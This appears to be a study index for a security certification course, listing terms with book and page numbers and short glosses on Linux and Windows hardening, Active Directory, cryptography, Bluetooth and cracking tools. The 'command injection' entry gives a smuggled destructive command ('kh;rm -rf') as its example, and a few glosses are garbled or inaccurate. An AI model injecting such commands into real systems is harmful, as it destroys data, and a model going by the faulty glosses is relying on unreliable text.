/etc/logrotate.conf error address option       6    net    this mails logrotate errors to an address.
/etc/logrotate.conf - include option           6    147    the include option allows the administrator to take log file rotation information, which may be installed in several files, and use it in the main configuration file; when logrotate finds the include option on a line in logrotate.conf, the information in the file specified is read as if it appeared in /etc/logrotate.conf
/etc/logrotate.conf - missingok option         6    147    tells logrotate to continue to the next file if the file doesn't exist, rather than quit with an error
/etc/logrotate.conf - monthly option           6    147    this is used to rotate log files monthly
/etc/logrotate.conf - rotate option            6    147    this specifies the number of times to rotate a file before it is deleted; a count of 0 (zero) means no copies are retained; a count of 5 means five copies are retained.
/etc/logrotate.conf - size option              6    147    the log file is rotated when the specified size is reached; size may be specified in bytes (default), kilobytes (sizek), or megabytes (sizem).
/etc/logrotate.conf - weekly option            6    147    this is used to rotate log files weekly
/etc/logrotate.conf directive {}               6    148    configuration parameters for a specific file are often required; a common example would be to include a section in the /etc/logrotate.conf file to rotate the /var/log/wtmp file once per month and keep only one copy of the log; when configuration is required for a specific file, the following format is used: filename { options }
/etc/logrotate.conf endscript                  6    149    marks the end of the prerotate or postrotate portion of the script.
/etc/logrotate.conf postrotate                 6    149    specifies that the following commands are to be run on the log file after the file has been rotated by logrotate.
/etc/logrotate.conf prerotate                  6    149    specifies actions to be taken prior to the file being rotated by logrotate.
/etc/logrotate.conf sharedscripts              6    149
/etc/logrotate.d                               6    147    directory containing all the logrotate config. files
/etc/master.passwd                             6     51    FreeBSD shadow file name
/etc/pam.d                                     6     58    directory containing all PAM configuration files, named for the services they control, e.g. /etc/pam.d/su
/etc/pam.d/system_auth                         6     60    configuration file for password enforcing (pam_cracklib argument), restricting use of previous passwords (pam_unix argument) and locking a user account after failed logins (pam_tally module)
/etc/passwd                                    6     50    system users db --> username:x:uid:gid:comment:homedir:login shell
/etc/rcX.d                                     6     89    run (condition) level dir; normally there's one directory for each run condition; file names start with S or K
/etc/security/opasswd                          6     61    if it doesn't exist, create it, for restricting the use of previous passwords
/etc/services                                  6     76    connects port numbers to protocols; has a list of all services, e.g. telnet 23/tcp
/etc/security/passwd                           6     51    AIX shadow file name
/etc/shadow                                    6   51,53   linux and solaris shadow file name; it contains users' encrypted passwords and password aging --> username:encrypted passwd:lastchg:min:max:warn:expire:inactive:flag
/etc/syslog.conf                               6    136    selector (facility, level of priority)   action
/etc/syslog.conf actions                       6    139    how messages should be handled (file, terminal, remote host, user, fifo file)
/etc/syslog.conf facilities                    6    137    facility: specifies how the msg was produced, e.g. auth, cron, authpriv, daemon, kern, lpr, mail, news, syslog, user, local0-local6
/etc/syslog.conf levels                        6    138    priority level (emerg, alert, crit, err, warning, notice, info, debug, none); * --> means all
/etc/xinetd.conf                               6    110    the global xinetd configuration file, read once when the xinetd service is started; some defaults in it (instances, log_type, log_on_success, log_on_failure, cps)
/etc/xinetd.d dir                              6    111    directory containing all service-specific files; contains the config file of each service managed by xinetd; these files are read only when xinetd is started
/tcb/files/auth/r/root                         6     51    HP-UX shadow file name
/usr/src/.poop                                 6    185    the ramen worm saves its code in that directory on an infected linux
/var/adm/messages                              6    132    solaris syslog file (date time hostname program name: msg sent to syslogd)
/var/adm/sulog file                            6    129    file fields: activity (always SU), date, time, +/- (successful/unsuccessful), terminal, starting user, ending user
/var/adm/SYSLOG                                6    132    IRIX syslog file (date time hostname program name: msg sent to syslogd)
/var/adm/syslog                                6    132    HP-UX syslog file (date time hostname program name: msg sent to syslogd)
a distribution group in AD              5   100   like an e-mail list
absinthe                                2   263   tool to make blind sql injection
absolute path( reference)               6    29   the path specified from the top of the tree to the desired file
Access Contol / Controlling Access      2   108   least privilege,neet to know,seperation of duties,rotation of duties
Access Control                          2   101
access control list ACL                 5    32   each resource has a list contain (SIDs and permission of each SID to this resource)
Access Control Scope                    2   102   many areas of IT
Access Control Techniques               2   109   DAC, MAC, RBAC, ...
access control types                    1   238   directive, preventive, deterrent, detective, suppressive, reactive, corrective
Access control: Passwords               2   118   how hash-based authentication is done
Access managing                         2   111   account administration, maintenance, monitoring, revocation
accesschk.exe                           5   117   can check or modify your MIC (integrity) label
account administration                  2   111
Account control                         2   102   monitor unsuccessful logins
account lockout policy                  5   164   lockout duration, lockout threshold: 5, reset account lockout counter: 45 min
Account Management                      2   102   create, modify, delete
account passwd info display             6    57   chage -l <username>
Accountability                          2   106   auditing your logs
ACE (Access control entries)            5    90   individual permission of a user, group or computer on an object; an individual entry in the DACL
Achilles                                2   232   tool that can edit session cookies
Achilles                                2   274   HTTP proxy (middleman between web server and browser); can negotiate separate SSL sessions (server side, client side)
Active Directory Permissions            5   112   each object has a SACL, a DACL and a creator owner
Active Directory Application Mode       5    10   ADAM, for applications which don't store data in Active Directory but use it for authentication
Active Directory Delegation Authority   5   114   delegate some authority, e.g. reading data for HR
active directory domain                 5    32   database of user accounts
active directory groups                 5    99   how a group can be created
active directory size                   5    33   maximum size is 4TB
active directory store                  5    32   accounts, Kerberos master keys, certificates, replication links, OUs, trust relationships
active monitor machine                  1    14   in Token Ring with a MAU, the primary machine checks for malfunctioning machines by polling them 7 times each second
active server page exploit              5   241   requires the .asp mapping
Active X                                2    36
ActiveSync                              5    17   malware can move from PC to mobile and vice versa
ActiveX (signed ActiveX)                2   239   not secure; its control runs with the same privilege as the user, which may be admin
AD Authentication                                2   114   uses Kerberos V5; doesn't send the password over the network
ADAM                                             5    10   Active Directory Application Mode, LDAP-based services, better Unix support
Adaptive chosen Plaintext attacks                4   73    special case of the chosen-plaintext attack; the cryptanalyst knows many chosen plaintexts + many ciphertexts
ADFS                                             5    10   Active Directory Federation Services, single sign-on across forests and company boundaries
ADM/ADMX templates                               5   157   administrative templates, can be edited using Notepad, ADM for any Windows version
administrative controls                          3   262   policies, procedures, end-user security awareness program
administrative shares                            5   105   enter the full UNC: C$, D$, ADMIN$ > c:\windows; permission: Administrators full control
administrative shares                            5   105   ADMIN$ allows the Authenticated Users group
administrative shares IPC                        5   105   shouldn't be modified
administrative shares removing                   5   105   two registry keys are set to zero: "autosharewks" REG_DWORD, "autoshareserver" REG_DWORD
administrative accounts                          5   175   admins, domain admin, enterprise admin, schema admin, DNS admin, account operator == built-in administrator account cannot be locked out == administrator account lockout from over the network == limit local account use of blank password to console logon only == administrator account policies & recommendations
administrative accounts locking                  5   175   strong password, smart card authentication, enable lockout for the admin account, decoy account
administrative templates                         5   157   container for many security settings from the registry: restrict Control Panel, password screen saver
administrative templates                         5   157   ADM/ADMX templates; ADM for any Windows version, ADMX from Vista and later
Advanced security settings                                   deny overrides allow
AES - Advanced Encryption Standard               4   62    has three key sizes: 128-bit, 192-bit and 256-bit
AES - evaluation criteria                        4   62    security, cost, and algorithm and implementation characteristics
AES algorithm details                            4   64    the algorithm details with functions
AES basic functions                              4   65    AddRoundKey(), SubBytes(), ShiftRows(), MixColumns()
AES development                                  4   66
AGULP                                            5    97   accounts > global groups > universal groups > local groups < permissions == inner group, outer group
AIDE                                             2    43   performs integrity checks
ALE (annualized loss expectancy)                 3   268   annual expected loss based on a threat; SLE * multi-hits of the exploit
ALE (annualized loss expectancy)                 3   270   ALE - multi-hits; ALE = SLE * annualized rate of occurrence
Algorithm computational complexity               4   51
algorithm is a group                             4   59    means that encrypting multiple times is a waste of time
alteration of code                               3    40   compromises the integrity of a program or data; creates backdoors, viruses, worms
anonymous access                                 5   169   null session vulnerability; not used so much with XP and later
anomaly analysis                                 3   178   inclusive detection method, for specific protocols or applications
anonymous access disabling                       5   170   anonymous access - allow anonymous SID/Name translation --> disabled
anonymous access                                 5   170   NO access without explicit anonymous login
anonymous connection, additional restrictions    5   170   Do not allow anonymous enumeration of SAM accounts and shares --> enabled
Anonymous permissions / ANONYMOUS LOGON grp      5   170
Anonymous Restrict                               5   170   set to 2 to disable null sessions; system\currentcontrolset\control\lsa
anti-malware scanner                             5    18   for Windows Mobile: Airscanner, BitDefender, F-Secure, Computer Associates
antivirus - Activity monitoring          2    43   behavior blocker
anti-virus - heuristic (guiding)         2    43   searches files looking for malicious-looking code routines; doesn't depend on signatures
antivirus - Integrity check              2    43
Antivirus capability                     2    42   scanner, activity monitor, integrity check
antivirus -Scanners                      2    43
antivirus -Stripping E-mail Attachment   2    44
Apache Tomcat                            2   236   application server that implements Java, JavaServer Pages
AppArmor                                 6   200   is a SECLinux (secure Linux) & the only answer is NO, i.e. --> more restrictive security rules
AppArmor                                 6   206   an alternative to SELinux that also uses the LSM framework; interchangeable with SELinux; includes a fully configurable MAC model as well as a learning mode; available on SUSE, openSUSE and Ubuntu
apple finder program                     6   12    similar to Windows "Network Neighborhood"; in a large network with multiple OSes it causes bandwidth issues
application behaviour hips               3   236   the manufacturer selects supported apps and records the intended functionality of the app in normal use
application control firewall             3    64   most popular personal firewall; has a set of rules for applications
Application locker(App Locker)           5    12   specify centrally what software is allowed to run on users' PCs
Application Locker(App Locker)           5   178   needs at least one Server 2008 R2 to push the AppLocker GPO; Server 2008 R2 / Windows 7 enhanced SRP with new options, an improvement on SRP
application protocols analysis           3   179   exclusive method; standard definitions, implementation nuances, changes to the protocol
application shielding behavior           3   238   locks an application into a sandbox where it is not permitted to communicate with other applications
application tier                         2   218   code and business logic; language (C, Java, PHP, VB); application server (WebSphere, WebLogic, Tomcat, .NET)

apt                                      6   161   Advanced Package Tool; update tool for Debian-based Linux such as Knoppix and Ubuntu; packages have the .deb extension
apt-get                                  6   161   stores a DB of your versions & then contacts the website to tell you the differences; it'll also tell you about the dependencies but won't install them
apt-get install pkgname                  6   162   install a new package
apt-get remove pkgname                   6   162   remove a package
apt-get update                           6   161   update the local DB of available packages
apt-get upgrade                          6   161   download and install upgrades
apt-show-versions -a pkgname             6   162   show all available versions of a given package
apt-show-versions -u                     6   161   check and see which packages need updating
arbitrary code execution                 2   260   web attack
Arbitrary Substitution                   4    18   uses a one-to-one substitution of characters
ARO (annualized rate of occurrence)      3   270   is the estimated frequency at which a threat is expected to occur; could be easy to calculate or very complex
ARP                                      1    68   is independent of IP; EtherType in the Ethernet frame = 0x0806
ARP (Address resolution protocol )       1    67   given an IP address, determine the MAC address; RFC 826
arp header,types                         1    68   ARP is not restricted to MAC and IP only
Arrest                                   2   181   deprive an individual of his freedom
ASP application service provider           2   244   SLE, patch, audit every 6 months, vuln scan
ASR (Automated System Recovery)            5    69   can be created using ntbackup.exe
asset identification and valuation         3   280   risk management step 2; understand the quantitative analysis of your assets
Asymmetric Key Cryptosystem                4   28    aka "public key"; slow; public key widely distributed within the digital signature; technical non-repudiation via digital signature
ATM                                        1   15    cell = 53 bytes, connection oriented, packet switching, shared network medium, QoS, PVC, SVC, VPI, VCI, video streaming, low latency
ATM                                        1   15    Asynchronous Transfer Mode
Atm Pvc                                    1   16    permanent virtual circuit, set up manually in advance
ATM Svc                                    1   16    switched virtual circuit, set up automatically on the fly through a signaling protocol
Atm virtual channel identifier (VCI)       1   16    used to route cells from one ATM switch to another; identifies the connection between two ATM switches
ATM virtual Path identifier (VPI)          1    16   labels a collection of VCIs grouped into a virtual path
attack history                             3   117   from 1995 to 2009
audit access to registry key               5   322
audit account logon events                 5   319
audit account management                   5   319
Audit best practices/should be audited     5   324   audit the interesting things: logs, privileged access, changes to admin access
audit directory service access             5   319
audit logon events                         5   319
audit object access                        5   319
audit object access policy                 5   321   enabling it alone logs nothing; enable it, then enable a SACL on the objects you want logged
audit policies                             5   319   audit account logon events, audit account management, audit directory service access
audit policy change                        5   319
audit policy compliance                    5   297   maintain and check written logs; examine machines with tools
audit privilege use                        5   320
audit process tracking                     5   320
audit system events                        5   320
auditing                                   5   266   the gathering and analysis of detailed information about the network
auditpol.exe                               5   320   tool from the Resource Kit; enables or disables audit policies from the command line
auditpol.exe /get /category:*              5   311   get the current audit policy for all categories
auditpol.exe /get /category:*              5   320
AUP (Acceptable use policy)                2    59   defines the acceptable or appropriate use of org. IT resources
AUP (Acceptable use policy)                2    74   provides guidelines for appropriate use of org. resources
Authentication                             2   106   something you know, have, are; some place you are (console)
Authentication                             4   12    validating the authenticity of the person with whom you are communicating
authoritative reply                        1    75   the DNS client can use the data and make the actual connection
Authorization                              2   106   what you are authorized to do and have access to; least privilege
automatic demotion to guest "file share"   5   174   simple file sharing in WinXP: all remote authentication is done using the guest account
autokey of stream cipher                     4    24
automate sp install (Hands free SP)          5     55
automate sp with group policy                5     56
automatic intruder detection                 1    244      vibration, heat, pressure, beam sensors
automatic update                             5     60      connects in the background on a scheduled basis; built in to Win2000 and later == Windows/Automatic Update tab in Win2000 SP3 & later (AUT, scheduled) == update using an ISO file
automatic update                             6    160      not good to be used on a production system (by yum or up2date "Red Hat update agent" or synaptic "apt")
automation                                   5    266      everything you can do with Windows without a mouse
AUTOMOUNTD                                   6    105      RPC service that mounts and unmounts NFS resources only when needed
autoRuns                                     5    284      allows you to see and edit startup commands at boot; Sysinternals
autorunsc.exe                                5    313      Sysinternals Autoruns, console version
Availability monitoring                      2    270      alerts when the site is unavailable; helps to verify the functionality of the network and web server
AYIYA                                        1     82      Anything In Anything tunneling
backup & restore center integration          5     80
backup 3rd party                             5     74      ARCserve, UltraBac, Archive, OmniBack
Backup access - OPSEC                        4    245      having backup access gives you the right to copy, erase or overwrite files, so it is dangerous in the hands of a malicious user
backup generators                            1    232      convert fuel into electrical power; aren't suitable for short-duration failures because they need time to warm up
Backup plan (schedule) - OPSEC               4   245,246   you need to have a backup plan, & don't assume that this plan works well until you have fully tested it and tried a full recovery
backup vista home basic,premium              5     72      doesn't support: backup all drives and system state
backup win xp/2003                           5     69      backup system state (registry, certificate DB, AD database, boot-up files)
backup win7,2008,vista                       5     72      backup all drives and system state, backup selected file types
backup/restore files and directories right   5    124      can make copy …ignore ntfs permissions
bad sites                                    5    187      include both known phishing sites & malware download URLs
Base-64 encoding                             2    247      isn't encryption and provides no security; easily reversible
Baseline - definition                        2     64      more specific (implementation-specific technical details) than a standard; compulsory (mandatory)
Baseline document                            2     35      mapping the network, conduct vuln assessment
Baseline document - policy                   2     59
Basic mode Authentication                    2    247      data sent in the HTTP header in clear text, Base-64 encoded
Bastille linux                               6    189      hardening program; reports on how secure the system is and shows security issues (educates the admin), why they should be fixed and what side effects the fix might have; can also optionally fix issues (changes can be reverted); runs on Linux, HP-UX, Mac OS X
BCP (business continuity plan)               2     83      plan for emergency response (DRP & business resumption plan); restore business after a disaster; the long-term impact to the business does not just involve IT but all levels of the org.
BCP elements                                 2     89
BCP Key Component                            2     91      Assess, Evaluate, Prepare, Mitigate, Respond, Recover
BCP Vs. DRP                                  2     87
BCP/DRP                                      2     88
BCP/DRP Mistakes                             2     95
BCP-DRP lifecycle                            2     94   project initiation, risk analysis, BIA, build the plan, test and validate it, update it, approve
BD_ADDR                                      4   151   is the MAC address of the Bluetooth device
BDC                                          5    32   backup domain controller; receives changes from the other AD
best approach in identifying                 3   260   is to concentrate on protecting the areas that, if compromised, could incur the most damage
Best evidence                                2   188   photos, models, drawings are used
better os                                    6    5    all have advantages, limitations and liabilities, and since they come together they represent risk
Beware of Overconfidence                     4    10   even if someone knows how the algorithm works, without the key he should still be unable to decipher the message; you must protect your key
BIA (Business Impact Analysis)               2    92   determines MTD (maximum tolerable downtime); evaluates the effect of a disaster over time
big endian                                   3    32   the most significant byte is on the left side, e.g. 0x00000000 (IP networking)
Big-O notation                               4    51   used to give a general idea of how many operations a problem takes relative to the input size n; used as an indication of a problem's complexity
binary disc image                            5    75   using the dd command or Symantec Ghost, create an image
bind                                         6   175   is a Linux application used for DNS, & can coexist with iptables
binding                                      5   201   a path of communication between a network component and a physical network adapter
biometric words                              4   133   PGP translates the hexadecimal digits into twenty biometric words that are easy to pronounce, to be validated
biometrics                                 1   241   checks physical characteristics of the human body
Biometrics                                 2   144   physical attributes: hand, eye, voice, face; mannerisms: keystroke, handwriting, tread
Birthday attack(Birthday paradox)          4   75    used with hash attacks
BIS                                        2   178
Bit Locker Transparent 100% to users       5   136   TPM only
bit locker-encryption                      5   133   for the whole drive, with paging & hibernate files
bit locker-integrity check details         5   134   boot sector, Master Boot Record, BOOTMGR, BIOS code
bit locker-requirements                    5   134   two drive volumes: boot-up & system
bit-flipping attacks                       1   158   a way to manipulate the checksum of the IP header
bitlocker availability                     5   133   Win Vista Ultimate and Enterprise, Server 2008; not in Vista Business or Win7 Professional
bitlocker benefits                         5   133   verification of integrity, sector-level encryption
bitlocker boot volume                      5   133   contains the Windows files, c:\windows
bitlocker disabling                        5   138   quick, temporary, doesn't decrypt; key saved in plain text on the hard disk; good for updating the BIOS
bitlocker drive encryption                 5    11   can verify the integrity of boot-up files; encryption key on USB or in the TPM
bitlocker prerequisite                     5   133   two NTFS volumes: boot volume, system volume
bitlocker recovery                         5   139   4 ways
bitlocker recovery password                5   140   48-digit PIN entered using function keys == FVEK when the recovery password is lost == BIOS support for function keys to enter the PIN, or during an emergency
bitlocker recovery/backup active directory 5   140   push recovery keys and the FVEK to AD
bitlocker steps how it works?                     5   134   integrity check using SHA-1
bitlocker system volume                           5   134   contains files used during the boot process
bitlocker tpm options                             5   136   TPM+USB+PIN, TPM+USB, TPM+PIN, TPM only, USB token with no TPM
bitlocker turnoff                                 5   138   time consuming, full decryption
BITS (background intelligent transfer)            5    63   downloads in the background so other applications aren't interrupted
Bit-slicing                                       2   125   cracking technique, rate = 137mb/s
black box test                                    2   274   code is closed source
blacklisting                                      2   268   filter out bad characters
blended threat                                    2    41   possesses multiple propagation vectors, e.g. Nimda
blind sql injection                               2   263   black box attack
BLOCK cipher - modes                              4   22    there are four modes and the mode affects the strength and performance of the cryptosystem: ECB, CBC, CFB, OFB
Block Ciphers                                     4    22   encrypt one block of data at a time
block worm traffic                                6   182
BlueScanner                                       4   154   tool for XP SP2 that lets a user discover nearby Bluetooth networks and categorize them by type and the services they offer
BlueSnarf attack                                  4   155   many Bluetooth vulnerabilities are at the application layer; allows retrieval of phonebook & calendar; the attacker remotely creates a virtual serial connection, which allows AT commands to be sent to the phone
Bluetooth                                         4   149   is a cable replacement technology; no line of sight; supports data, voice and other applications; can support up to 7 simultaneous connections
Bluetooth classes 1, 2, and 3                     4   150   class 2 is most commonly found in wireless cards, phones, laptop computers
bluetooth PAN                                     1    7    supports up to 7 devices; cable replacement technology; can be used for proprietary protocols and for standards-based protocols
Bluetooth protection                              4   157   1- configure devices in non-discoverable mode, 2- audit the Bluetooth environment, 3- use a strong PIN (12-digit), 4- vendors should implement SIG 2.0 specs / PKI support
Bluetooth protocol analyzer                       4   152   can passively capture and record all Bluetooth network activity within range
Bluetooth security                                4   151   PIN; encrypts transferred data using a security key generated from the PIN & the Bluetooth MAC
Bluetooth security issues                         4   152   eavesdropping attacks
Bluetooth Security keys                           4   151   when two devices connect for the first time, they use the PIN & BD_ADDR to generate permanent link keys that are stored on each device
Bluetooth sniffing impact                         4   156   an attacker could capture the data exchanged between a Bluetooth keyboard/mouse and the desktop/laptop system, and could inject keystrokes remotely
Bluetooth specification                           4   150   Range: 1m, 10m, 100m; Max BW = 2.1 Mbps; Freq = 2.5 GHz (FHSS) EDR
BNEP - Bluetooth Network Encapsulation Protocol   4   152   protocol used to configure Bluetooth devices to extend access to the wired network over a wireless network, like 802.11
BNEP (Bluetooth network encapsulation protocol)   1    7    responsible for delivering network packets; standards-based protocol
border router                                     1   33    assists the firewall: blocks RFC 1918 addresses; only packets from our ISP range can leave our network, to protect the firewall itself
boot loader                          6     81      prepares the system to begin the kernel; has 2 stages (1- MBR, 2- loader program that actually runs the Unix kernel)
boot loader password                 6     85      adv: attacker must have physical access; disadv: also needs physical access (if there is a power outage or system reboot)
boot loader password                 6    199      enables additional security validation
Boot record infector                 2     21      able to put itself into the boot process to load at startup
branchCache                          5     16      Server 2008 R2; enables SMB or HTTP caching via peer-to-peer or a centrally hosted cache
broadcast address                    1     62
broker process                       5    182
browsing                             3     37      can reveal sensitive information useful for attacks
BRP (Business Resumption plan)       2     84      refers to an actionable plan that coordinates efforts to restore the org. to normal working; involves all levels of the org., not only IT; covers the tactics of recovery of IT systems
Bruce Schneier                       4     7
Brute force attack                   2    123      always recovers the password, but it is a matter of time
brute force PIN                      4    152      a 4-digit PIN could be brute forced in 63 msec using a Pentium 4 3GHz system
brute forcing                        3     34      an attempt to gain access to a system by bombarding it with possible guesses until the correct one is found
Brutus                               2    274      brute force and password guessing tool, Windows only
BSD pkg manager                      6    167      pkg_add, pkg_delete
BSOD blue screen of death            5     89
buffer overflow                      3     31      used to execute code on a host; no boundary check on the inputs
Buffer overflow attack               2    260      web attack
Buffer overflow defence              2    261      update, patch (web server and language), run a vuln scanner, IPS, validate user input
BlueSniff                            4    152      tool to attack Bluetooth; can locate and circumvent the security of Bluetooth networks
Bulletin Board                       2    272      vulnerable to input attacks
bus physical topology disadvantage   1     8       confidentiality is not guaranteed, low fault tolerance, poor reliability, poor traffic isolation capabilities, limited scalability
business case Risk management        3   273,274
business case Risk management        3    274      if you can't prove that systems are at risk, it'll be harder to get funding for your recommendations; you can use some existing sources of data like the F/W or log system to prove it to them, show them a "smoking gun"
business case summary                3    287
bypassing firewall techniques        3    103      worms, wireless, modems, tunneling, VPNs, social engineering, home laptops
cable modem                          1     18      Data Over Cable Service Interface Specification (DOCSIS)
CAC - Common access card             4    115
cracking - methods                   2    123      find the user id and encryption algorithm, obtain the encrypted password, create a list of possible passwords, encrypt each password in the list, see if it matches
cain - Brute force attack            2    131      user selects (all alpha, alpha+num+special char)
cain - Cryptanalysis attack          2    131      uses a time/memory tradeoff, optimized with pre-computed tables
cain - Dictionary attack             2    131      it uses a hybrid attack: reverse, upper to lower, append 2 digits
cain - Rainbow tables                2    136
Cain dump password hashes and LSA             5   125
cain-password cracking                        2   130   audit cracking tool
Caligula virus                                2    37   info leakage,send PGP private key through FTP
canvas                                           3   118   exploitation suite, started in 2007
CAs - Certificate authorities                    4   117   create certificates based on the user's identity information
cat <filename>, cat <filename> | more         6   215   to concatenate or display files.
cat 1,2                                       1    21   voice low bandwidth
cat 3                                         1    21   voice 10 mb
cat 4                                         1    22   Voice 16 mb
cat 5                                         1    22   100 mb
cat 5e,6                                      1    22   more than 100 mb
cause,effect,response                         3   257   determine the risk,analyze the impact of risk,determine action to handle these risks
cavity viruses                                2    23   write themselves to blank or unused areas in host files
CBC - (Cipher Block Chaining mode)               4   22    plaintext is XORed with the previous ciphertext block; in this mode two identical blocks of plaintext never encrypt to the same ciphertext
CCB (Change Control Board)                       5   297   to ensure changes are made within control parameters, as part of configuration management
CCB (Change Control Board)                       5   297   any change done by the IT department is written here
CCMP - Counter-Mode/CBC-MAC Protocol             4   167   one of the 802.11i protocols; provides encryption, replay protection, integrity protection; requires a H/W chip to implement
CCTV (closed circuit television)                 1   243   detective and preventive control
cd <directory name>                              6   211   change directory
cdfs                                             5    88   file system for CD-ROM
Centralized control                              2   114   TACACS, RADIUS
centralized logging                              6   151   protects from log deletion; DoS possibility (so we need to determine specific machines and use a firewall); needs lots of disk; one machine holds lots of info (use ssh with limited logins and IPs); easy to search and scan (generate single reports)
CER (Crossover Error)                         2   145   FAR and FRR are equal
Certificate authorities models-Bridge CA      4   119
Certificate authorities models-hierarchical   4   119
Certificate authorities models-Hybrid         4   119
Certificate authorities models-Mesh           4   119
Certificate authorities trust models          4   119   hierarchical, Bridge, Mesh, Hyprid
Certificate policies document                 4   124   the documentation that specifies how certain certificate are to be used, tcp port 443
Certificate revocation list                   4   122
certificate's fingerprint                     4   133   used to trust the integrity of this certificate.
Certification key Escrow                      4   122   key backup
Certification life cycle                      4   120
Certification life cycle - expiration date    4   122
Certification life cycle - key ceremony       4   121   client browser
Certification life cycle - key storage                    4   121   by S/W (client browser) or H/W (TPM, CAC "Common Access Cards")
Certification life cycle - registration & initialization  4   120
Caesar Cipher                                             4    19
CFB - (Cipher feedback mode)                              4    22   it is a stream cipher mode used for encrypted interactive terminals
CGI common gateway interface                              2   236   standard for interfacing application s/w with a web server; allows the web server to pass info (C, Perl, Python)
chage -l (command)                                        6    57   display account password info
Chain of Custody (custody)                                2   184   document evidence, maintain its integrity
Challenge/response                                        2   142   not time based: user id - challenge - write it in the device - response - write it
Challenge question web authen                             2   249
CHAP (Challenge Handshake Authen pr)                      2   113   uses challenge/response authen, random challenge, never sends the password
Charset.txt                                               2   134   defines the chars used to generate rainbow tables
check point vpn-1                                         3   251   firewall plus something
chernobyl virus                                           2    37   destructs data; activates every 26 April, overwrites data on the HD
chgrp                                                     6    44   change file or dir group --> chgrp groupname file|dir
chkconfig command                                         6    94   provides an overview of what services are started & what starts @ each run level: chkconfig --list, chkconfig --level <#> <servicename> <on|off>
CHKDSK.exe                                                5    89   used to check file system consistency after power-off
chkrootkit                                                6   184   free malware scanning tool for the various unixes (acts as a warning system for well known malware but doesn't give much detail; it doesn't offer you any removal capability if the system is infected); if you will use it frequently, in a cron schedule for example, it's better to run it in "quiet mode" (chkrootkit -q) to show only potential problems
chkrootkit                                                6   184   looks for rootkits, sniffers, deleted logs, trojans, kernel modules
chkrootkit command                                        6   184   the first time it will tell you what it's checking for and what it found and didn't find
chkrootkit -q                                             6   184   works in quiet mode, where it only shows potential problems
chkrootkit -x                                             6   185   tells you what it found, in expert mode
CHML.exe                                                  5   117   can check and modify your MIC label == tool to restrict read and execute access by lower-integrity processes
chmod                                                     6    37
chosen ciphertext attack                                  4    74   cryptanalyst knows: ciphertext + plaintext; this attack is mainly used against asymmetric key (public-key) ciphers
chosen key attack                                         4    74   cryptanalyst knows: a specific relationship between the keys only
Chosen Plaintext attacks                                  4    73   cryptanalyst knows: 1 chosen plaintext + 1 ciphertext
chown                                                     6    44   change file or dir ownership --> chown username file|dir , chown user:group file|dir
CIDR (Classless Inter-Domain Routing)                     1    60   uses VLSM (variable length subnet mask) to allocate IPs to subnets according to individual needs
CIFS (common internet file system)                        5   101   like SMB with enhancements; NetBIOS is not necessary with it
CIH Virus                                                 2    37   destructs data; activates every 26 April, overwrites data on the HD
cipher.exe                                                5   126   cmd to encrypt and decrypt
cipher.exe /R:<filepath>                                  5   129   to create a recovery certificate at that path
cipher.exe /R:<filepath> /smartcard                       5   129   on Vista and later, a recovery certificate on a smart card; filepath for the .cer
cipher.exe /w                                    5    132      to wipe files from the hard disk; file scrubber, removes plaintext remains
cipher/combination locks                         1    240      mechanical locks accept one valid sequence; electronic locks can be programmed with multiple keys
cipher/combination locks                         1    240      rekeying must be performed for all users if any one user is to be removed from the authorized list
Ciphertext                                       4      6      is a message in its encrypted form
Ciphertext only attacks                          4     74      cryptanalyst knows: ciphertext only, no plaintext; the goal: recover one plaintext or the key
CIS (Center For Internet Security )              5    148      security templates and configuration guides, and assessment tools to go with them
CIS benchmark report                             6    188      the final score is not an absolute no., but is compared to other CIS benchmark scored systems
CIS hardening guide                              6    187      CIS comes up with the steps they think should be followed in securing that platform
CIS scoring tool                                 5    148      used to test the OS against the security template benchmark
Civil law                                        2    177
clamav                                           6    186      provides what is closest to antivirus packages on Windows; they update the signature db daily; the current release has signatures for potentially unwanted apps (but it's not enabled by default)
clamav installation                              6    186      "yum install clamav"; it will automatically install the clamav-db package as well, and this package contains the initial signature db, which will be updated nightly
clamav-db                                        6    186      installed automatically with clamav and contains the initial signature db
clamscan --detect-pua                            6    186      to enable "Detect Possibly Unwanted Applications"; it's not enabled by default
clamscan -r dir                                  6    186      to actually scan files
clamscan --remove                                6    186      remove known malware
class A,B,C                                      1     58      A 1-127, B 128-191, C 192-223
Classic - local users authenticate as themselves 5    174
clear                                            6    213      clear the screen of all output
clear text protocol                              4     81      telnet, rlogin, rsh, rexec
Client side programming                          2    238      enhance the user interface; req (javascript, activex, java, flash)
CLOSED                                           3     58      no connection between two hosts
cmdlet                                           5    290      tool run within PowerShell, supports piping
code number inside chevrons                      5    203      the code numbers can be looked up in the following table to reveal what services are running
Code Red Worm                                    5   239,241   IIS host header can block it if configured; requires .ida mapping on Win2000; IIS does not process the request of a script kiddy who only uses IP add. and port to connect to the server, as they send a wrong host header like the Code Red worm
Code signing                                     2    239      use a digital signature to assure the user that code comes from a known source
Cold boot attack                                 4    130      dumping the data from memory and using it to work around disk encryption, to be able to read the data
cold boot attack                                 5    137      passwords can be extracted from RAM by dumping raw memory
COM/Script Program Infector                      2     23      prepending at start of the program, appending at end, overwriting a portion of the file
command injection                                2    258      command on the input form, ex: kh;rm -rf
commands to find a compromised system            6     63      ps, netstat, dd
Common law                                       2    176
common services                                  6     95      file sharing (nfs, samba), naming (dns, nis/nis+), rpc (portmapper), internet (web, email)
competitive intelligence                         4    254      collecting open source information on a corporation
competitive intelligence ethics        4   255
computer configuration / GPO           5   153     applies even when no one logs on
computational complexity               4    51     of a crypto algorithm
Conficker worm                         2    32     vuln in MS server; brute forces passwords; infects removable devices with an autorun script
Confidentiality                        4    12
Confidentiality in Transit             4    84
configuration management               2    34
configuration naming context           5    39     defines all the sites, subnets and inter-site replication links
conservative approach (conservative)   2    56     more security benefits, but more cost and security staff
constant time                          4    51     O(1)
Contingency planning (emergency)       2    82     BCP & DRP
contraband checks                      1   242     deterrent and detective controls: x-ray scanner, metal detector, bag inspection
Cookies                                2   231     keep track of user state; created by the web server and stored in the web browser
Copyright                              2    79     Intellectual Property:
cost benefit analysis                  3   285     comparison between the cost of implementing countermeasures and the value of the reduced risk
cost of countermeasure                 3   285     initial cost + labor cost + life cycle cost
Covered writing                        4    34
cp <filename> <destination>            6   217     copy a file from one location to another
CPS - Certificate practice statement   4   117
Cracking                               2   119     offline process to guess passwords given password file info
Cracking Motivation                    2   124     attacker; admin: recover forgotten pass, audit, check filter effectiveness, aid user migration
Cracking RedHat pass file              2   126     can decrypt MD5+salts
creator owner group                    5    93     permissions applied to the owners, automatically granted to the owner
Criminal law                           2   177
CRL (Certificate Revocation List)      5   178
